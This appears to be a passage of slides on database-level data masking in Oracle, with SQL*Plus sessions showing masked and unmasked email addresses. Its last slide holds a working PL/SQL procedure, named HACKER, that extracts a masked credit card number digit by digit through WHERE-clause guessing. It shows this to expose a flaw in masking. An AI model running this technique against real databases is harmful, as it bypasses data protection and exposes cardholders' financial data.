If you want ensure that sensitive data is masked when presented to the end user, you could change every single application and report ... or you could just do it in one place in the database.
4. SQL> desc ACCOUNTS
Name Null? Type
----------------------------- -------- ------------
ID NUMBER(8)
NAME VARCHAR2(30)
EMAIL_ADDRESS VARCHAR2(30)
SQL> select * from ACCOUNTS;
ID NAME EMAIL_ADDRESS
-------- -------------------- -------------------
1 Suzanne suzy_q@yahoo.com
2 John Smith john.smith@hotmail.com
...
6. SQL> conn scott/tiger
Connected.
SQL> select * from ACCOUNTS;
ID NAME EMAIL_ADDRESS
-------- -------------------- -------------------
1 Suzanne xxxx@yahoo.com
2 John Smith xxxx@hotmail.com
...
7. SQL> conn system/manager
Connected.
SQL> select * from ACCOUNTS;
ID NAME EMAIL_ADDRESS
-------- -------------------- -------------------
1 Suzanne suzy_q@yahoo.com
2 John Smith john.smith@hotmail.com
...
18. SQL> create or replace
2 procedure HACKER is
3 buf varchar(40);
4 t char;
5 x number;
6 i number;
7 c number;
8 begin
9 i := 0;
10 c := 1;
11 while c < 17 loop
12 select count(*)
13 into x
14 from demo.customers
15 where substr(card_no,c,1)=to_char(i)
16 and customer_id = 4000;
17 if x > 0 then
18 c := c+1; buf := buf || to_char(i); i := 0;
21 else
22 i := i+1;
23 end if;
24 end loop;
25 dbms_output.put_line('CC: ' || buf);
26 end;
Procedure created.
SQL> exec HACKER
CC: 1234123412341234